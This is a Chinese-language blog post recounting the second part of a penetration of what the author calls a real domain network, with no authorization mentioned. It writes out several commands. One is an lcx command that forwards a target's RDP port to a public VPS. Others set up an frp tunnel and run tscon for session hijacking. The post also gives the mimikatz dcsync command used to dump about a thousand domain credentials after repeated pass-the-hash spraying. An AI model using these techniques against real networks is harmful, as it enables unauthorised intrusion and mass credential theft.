|
|
记一次真实环境渗透(下)[color=rgba(0, 0, 0, 0.3)]原创 [color=rgba(0, 0, 0, 0.3)]Buffer [url=]红队蓝军[/url] [color=rgba(0, 0, 0, 0.3)]2022-02-19 10:12
[color=rgba(0, 0, 0, 0.5)]收录于话题
#jboss[color=rgba(0, 0, 0, 0.3)]1个
#内网渗透[color=rgba(0, 0, 0, 0.3)]1个
前言上次说到,探测到内网三台主机有ms17010的漏洞,准备深挖一波。 MS17010cs上还是不太好打,派生个会话给msf。我的vps是windows server的,一开始下了个windows版的msf在vps上,但是添加路由的时候一直说我参数不对,就不知道咋回事。 还是算了,就搞个代理到本机用虚拟机kali吧。我用的是frp,vps当server,虚拟机当client vps配置frps.ini配一个端口
kali配置frpc.ini 然后vps上命令行启动frps.exe frps.exe -c frps.ini kali执行 frpc.exe -c frpc.ini 这样就可以愉快的派生会话了,但是这里最后打的时候三台主机没一台能打下来。首先三台主机都没有开启管道,只能用eterblue模块,最后也没成功,这个域系统安全性还是比较高的。 pth没办法,系统漏洞一台拿不了,但是通过端口扫描发现大量主机开启445端口,于是还是先pass the hash 批量撞一波
断断续续拿下不少主机
这时就一台一台的信息收集 rdp劫持会话在27这台主机上发现,有两个会话,上面是我们已知账号和明文密码的普通域内账户,而下面这个用户经过比对,为域中域管用户。
由于我们自身权限也高,这里就想rdp上去劫持该会话(当时打的时候比较激动,没注意看这个会话是失效的,这里还是记录一下)看眼时间,应该在休息呢 lcx设置代理目标机器上shell C:\Windows\system32\lcx.exe -slave 公网ip 7212 127.0.0.1 3389vps上 lcx -listen 7212 5555
在cs上执行shell tscon 2,没有权限。 在目标机器执行的时候提示错误的密码,猜想大概是会话断联的原因。如果STATE是active应该是没问题的。 拿下DC将所有拿下的主机的hash全部dump出来,整合后发现有Administrator的账户hash,且是域中账户,而在域中Administrator是作为域管账户的。445端口开启
尝试pth
失败了,如果不能pth这个hash将索然无味,又不能拿到明文这里搞了很久,然后又回去信息收集。搞来搞去搞了很久,还是那么7、8台主机,最后也是没办法,由于抓到了很多密码,把所有Administrator用户的hash全部pass了一遍,终于拿下了域控
导出ntds,抓下密码,这里使用mimikatzlsadump::dcsync /domain:xxx /all /csv command
将近一千个用户,RDP他们好像随时都是连着的。 想3389上去看一下,找一个没有连接的用户
找到该用户的hash拿去解密
成功连接
ENDING...往期推荐 记一次真实环境渗透(上) 进程强杀初探 基于filter的内存马 thinkphp 3.x反序列化分析 thinkphp 3.x rce分析 最全thinkphp 3.x sql注入分析 浅谈命令混淆 记一次靶场渗透测试 记一次略坑靶场渗透(下) 一次略坑靶场渗透(上) 进程伪装详解 记一次log4j2引发的渗透
[color=rgba(0, 0, 0, 0.9)]红队蓝军[color=rgba(0, 0, 0, 0.5)] 一群热爱网络安全的人,知其黑,守其白。不限于红蓝对抗,web,内网,二进制。
[color=rgba(0, 0, 0, 0.5)] 22篇原创内容
[color=rgba(0, 0, 0, 0.3)] 公众号
[color=rgba(0, 0, 0, 0.3)]喜欢此内容的人还喜欢
进程强杀初探
[color=rgba(0, 0, 0, 0.3)]红队蓝军
不喜欢
[color=rgba(0, 0, 0, 0.9)]不看的原因
确定
 微信扫一扫
关注该公众号
|
|
发表于 2022-2-19 10:28:00